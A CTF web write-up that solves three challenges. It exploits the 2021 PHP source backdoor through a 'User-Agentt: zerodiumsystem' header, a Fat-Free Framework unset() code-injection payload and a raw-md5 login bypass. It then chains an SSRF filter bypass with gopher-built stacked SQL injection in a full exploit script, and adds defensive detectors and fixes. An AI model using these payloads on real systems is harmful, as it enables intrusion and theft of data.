[toc]

Can't they give us web players something from the land of the living for once???

签到 (Sign-in)


The challenge is a blog. After poking at it for a good while I found no vulnerability at all. This sign-in challenge was hellishly unfair; without the hint it would certainly have stayed at zero solves.

PHP is the mainstream web server language today, with over 60% of the market, so as server software its impact on security is enormous. On March 28 a PHP source-code poisoning incident came to light: the git.php.net server was apparently compromised and an attacker pushed two commits containing backdoor code. The details are still under official investigation, and the code repository has been moved to the more secure GitHub. The backdoor logic was obvious, was quickly spotted by the maintainers, and the commits were rolled back.

Below we try out how this backdoor is exploited:

```bash
curl -H "Accept-Encodeing: gzip,deflate" -H "User-Agentt: zerodiumsystem('cat /flag');" -v http://eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com/index.php
```

Running it gives the following:

```
*   Trying 118.212.233.160:80...
* Connected to eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com (118.212.233.160) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com
> User-Agent: curl/7.74.0
> Accept: */*
> Accept-Encodeing: gzip,deflate
> User-Agentt: zerodiumsystem('cat /flag');
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 03 Apr 2021 03:09:04 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Vary: Accept-Encoding
< Vary: Accept-Encoding
< X-Via-JSL: 9450dd0,-
< Set-Cookie: __jsluid_h=5f9a20fe217702a0598a45a2a0c8ce13; max-age=31536000; path=/; HttpOnly
< X-Cache: bypass
<
flag{7aa7a410-7595-48e9-bc14-8ad5c1dd71f4}<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at REMOVETHIS: sold to zerodium, mid 2017:1) in <b>/var/www/html/htmlport.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>: session_start(): Session cannot be started after headers have already been sent in <b>/var/www/html/htmlport.php</b> on line <b>5</b><br />
<!DOCTYPE HTML>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<title>个人博客</title>
<meta name="keywords" content="个人博客" />
<meta name="description" content="" />
<link rel="stylesheet" href="css/index.css"/>
<link rel="stylesheet" href="css/style.css"/>
<script type="text/javascript" src="js/jquery1.42.min.js"></script>
<script type="text/javascript" src="js/jquery.SuperSlide.2.1.1.js"></script>
<!--[if lt IE 9]>
<script src="js/html5.js"></script>
<![endif]-->
</head>
......
* Connection #0 to host eci-2zecqhthq774p5l0ez1r.cloudeci1.ichunqiu.com left intact
```

As shown above, line 23 of the output (the `flag{...}` line printed before the PHP warnings) contains the flag.
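From the defender's side, the request above is easy to spot: the backdoor is triggered through a header literally named `User-Agentt` (doubled t) whose value carries the `zerodium` marker followed by PHP code. The following detector is an added example, not part of the write-up; the two sample requests are constructed for the demo.

```python
# Added example (not from the write-up): flag requests that carry the trigger
# of the March 2021 git.php.net backdoor, as exercised by the curl command above.
# The sample requests below are constructed; the hostname is a placeholder.
TRIGGER_HEADER = "user-agentt"   # look-alike of User-Agent, compared case-insensitively
TRIGGER_MARKER = "zerodium"      # marker the backdoored build keyed on

def parse_headers(raw_request: str) -> list:
    """Split a raw HTTP/1.1 request into (name, value) header pairs."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:       # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs

def backdoor_trigger(raw_request: str):
    """Return the offending header value, or None when the request is clean.
    A User-Agentt header alone is already suspicious, but only values carrying
    the marker could reach the backdoored eval, so both conditions are required."""
    for name, value in parse_headers(raw_request):
        if name.lower() == TRIGGER_HEADER and TRIGGER_MARKER in value.lower():
            return value
    return None

# Constructed samples: the first mirrors the write-up's curl request, the second
# is a normal browser request that merely mentions the word in its User-Agent.
SUSPECT = ("GET /index.php HTTP/1.1\r\nHost: blog.example\r\n"
           "User-Agent: curl/7.74.0\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n")
BENIGN = ("GET /index.php HTTP/1.1\r\nHost: blog.example\r\n"
          "User-Agent: Mozilla/5.0 zerodium-research\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, "->", backdoor_trigger(req))
```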

unsetme

The challenge provides the source:

```php
<?php
// Kickstart the framework
$f3=require('lib/base.php');

$f3->set('DEBUG',1);
if ((float)PCRE_VERSION<8.0)
    trigger_error('PCRE version is out of date');

// Load configuration
highlight_file(__FILE__);
$a=$_GET['a'];
unset($f3->$a);   // user-controlled property name passed straight to unset() on the framework object

$f3->run();
```

Fat-Free Framework is an open-source web framework written mainly in PHP. Version 3.7.1 of Fat-Free Framework contains an injection vulnerability that an attacker can use to execute arbitrary code. Link: https://github.com/bcosca/fatfree-core/commit/dae95a0baf3963a9ef87c17cee52f78f77e21829

```
http://eci-2ze3piaq8erabuvlmwd3.cloudeci1.ichunqiu.com/?a=:[]);phpinfo();//
```


Then run the following to get the flag:

```
http://eci-2ze3piaq8erabuvlmwd3.cloudeci1.ichunqiu.com/?a=:[]);system('cat /flag');//
```

“慢慢做” ("Take Your Time") Management System


The challenge presents a login form:


It sat at zero solves for the first half hour, until the hint was released:

```php
SELECT * FROM users WHERE password = '".md5($password,true)."' limit 0,1";
```

This is clearly the md5($password, true) login bypass: https://blog.csdn.net/March97/article/details/81222922

There are two known bypass strings, ffifdyop and 129581926211651571912466741651878684928, but ffifdyop is filtered, so the second one logs us in:

```
/?username=admin&password=129581926211651571912466741651878684928
```
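Why those two strings work, and how the query should have been written, as an added example that is not part of the write-up. It rebuilds the challenge's query text in Python (latin-1 maps each raw digest byte to one character, as PHP's string concatenation does) and contrasts it with a placeholder-bound hex digest.

```python
import hashlib

# Added example, not from the write-up. md5($password, true) returns the 16 raw
# digest bytes, and the challenge splices them straight into the SQL string.
def vulnerable_query(password: str) -> str:
    raw = hashlib.md5(password.encode()).digest().decode("latin-1")
    return "SELECT * FROM users WHERE password = '" + raw + "' limit 0,1"

def breaks_out_of_literal(password: str) -> bool:
    """True when the raw digest contains the bytes 27 6f 72 27 ("'or'").
    The query then reads  password = '' or '<rest of digest>'  and, because
    the rest of the digest starts with a digit ('6' for ffifdyop, '8' for the
    numeric string), MySQL casts it to a non-zero number, so the OR branch is
    true for every row and the first user (admin) is returned."""
    return b"'or'" in hashlib.md5(password.encode()).digest()

def hardened_query(password: str):
    """Same lookup without the injection: a hex digest contains only [0-9a-f],
    never a quote byte, and it is bound through a DB-API placeholder instead of
    being concatenated. Unsalted MD5 is still a poor password hash; this change
    only removes the injection, a real fix also moves to a proper password hash."""
    return ("SELECT * FROM users WHERE password = %s limit 0,1",
            (hashlib.md5(password.encode()).hexdigest(),))

if __name__ == "__main__":
    for pw in ("ffifdyop", "129581926211651571912466741651878684928", "hunter2"):
        print(pw, breaks_out_of_literal(pw), repr(vulnerable_query(pw)))
```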

After logging in we reach the SSRF page:


Use 0.0.0.0 to bypass the internal-address filter and reach admin.php:

```
/ssrf.php?way=0.0.0.0/admin.php
```


Next we use the gopher protocol through the SSRF to perform SQL injection, because logging in directly from the outside returns nothing. Here is a script that builds the gopher payload:

```python
import urllib.parse

post_data = '''username=admin'+or+1=1#&password=123'''
post_data_length = len(post_data)
test =\
"""POST /admin.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=2pavr80foc7vdc8m6ikg6ifns5;
Content-Length: {0}

""".format(post_data_length)
test += post_data
# note: the request must end with a line break; a trailing line break marks the end of the HTTP request
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')          # HTTP wants CRLF line endings
result = 'gopher://127.0.0.1:80/'+'_'+new  # gopher payload; the leading "_" is the gopher selector byte
print(urllib.parse.quote(result))          # sent in a GET parameter, so it must be URL-encoded a second time
```
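The two SSRF weaknesses used in this challenge, a host filter that 0.0.0.0 slips past and a fetcher that accepts gopher://, come from validating the `way` string instead of the destination. The following is an added example, not the challenge's code; `naive_is_allowed` is a guess at the kind of prefix filter that lets both payloads through, and `hardened_is_allowed` is the check a defender would want. It assumes a bare `host/path` value is fetched over http://, and takes a caller-supplied resolver so it runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Added example, not the challenge's ssrf.php. Assumption: a "way" value with no
# scheme (e.g. "0.0.0.0/admin.php") is fetched as http://<value>.
def normalize(way: str) -> str:
    return way if "://" in way else "http://" + way

def naive_is_allowed(way: str) -> bool:
    """A string-prefix blocklist (guessed, not the real filter). 0.0.0.0 still
    reaches the local machine but matches no prefix, and a scheme prefix such
    as gopher:// hides the 127.0.0.1 that follows, so both payloads pass."""
    blocked = ("127.", "10.", "192.168.", "172.", "localhost")
    return not way.lower().startswith(blocked)

def hardened_is_allowed(way: str, resolve=None) -> bool:
    """Allow only http(s) to globally routable addresses. Hostnames go through
    `resolve` (hostname -> list of IP strings) and every returned address is
    checked, which also covers names that resolve to internal ranges; with no
    resolver the request is denied rather than guessed at."""
    parts = urlsplit(normalize(way))
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname
    try:
        addrs = [ipaddress.ip_address(host)]        # IP literal, incl. [::1]
    except ValueError:
        if resolve is None:
            return False
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except ValueError:
            return False
    # is_global is False for 0.0.0.0/8, loopback, RFC 1918, link-local, etc.
    return bool(addrs) and all(a.is_global for a in addrs)

if __name__ == "__main__":
    for way in ("0.0.0.0/admin.php", "gopher://127.0.0.1:80/_POST", "127.0.0.1/admin.php"):
        print(way, "naive:", naive_is_allowed(way), "hardened:", hardened_is_allowed(way))
```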

First test with a universal SQL password:

```
username=admin'+or+1=1#&password=123    # spaces are filtered, use + instead
```

Run the gopher construction script above; the resulting payload is:

```
/ssrf.php?way=gopher%3A//127.0.0.1%3A80/_POST%2520/admin.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250ACookie%253A%2520PHPSESSID%253D2pavr80foc7vdc8m6ikg6ifns5%253B%250D%250AContent-Length%253A%252036%250D%250A%250D%250Ausername%253Dadmin%2527%252Bor%252B1%253D1%2523%2526password%253D123
```


The response shows that SQL injection exists and that every row of the current table was dumped. The data obtained is obviously fake; to get the admin user's real password we need to look in other tables.

Testing shows that the username field allows stacked injection, and that besides the fake_admin table dumped above, the current database also holds a table named real_admin_here_do_you_find. Obviously admin's real password is in real_admin_here_do_you_find, so we use stacked injection to rename the tables. Since both tables have the same column structure we need no ALTER statement, only RENAME:

```
username=admin';rename+table+fake_admin+to+fake_admin1;rename+table+real_admin_here_do_you_find+to+fake_admin;#&password=123
```

After this runs, real_admin_here_do_you_find has been renamed to fake_admin. Running the universal password once more now dumps admin's real password from the original real_admin_here_do_you_find table:

```
username=admin'+or+1=1#&password=123
```


Then build another gopher payload that logs in as admin through the SSRF, and use the internal session cookie to request flag.php, which returns the flag:


Here is the complete exploit script:

```python
import urllib.parse
import requests
# rename table fake_admin to fake_admin3;rename table ctf.users to ctf2.fake_admin;show tables;
post_data = '''username=admin&password=5fb4e07de914cfc82afb44vbaf402203'''
post_data_length = len(post_data)
test =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=6o42rvm6k3urn764rin0mn17m6;
Content-Length: {0}

""".format(post_data_length)
test += post_data
# note: the request must end with a line break; a trailing line break marks the end of the HTTP request
tmp = urllib.parse.quote(test)
new = tmp.replace('%0A','%0D%0A')          # HTTP wants CRLF line endings
result = 'gopher://127.0.0.1:80/'+'_'+new  # gopher payload aimed at the internal web server
payload = urllib.parse.quote(result)       # second encoding, since it travels in a GET parameter

url = "http://eci-2ze8pd94714jhax3okrx.cloudeci1.ichunqiu.com/ssrf.php?way="
headers = {
    'Cookie': "PHPSESSID=03g366r9e95pcn68nh1vtvms82"   # our own (external) session on the SSRF page
}
print(payload)
web = requests.get(url+payload,headers=headers)

print(web.text)
print(url+payload)
```
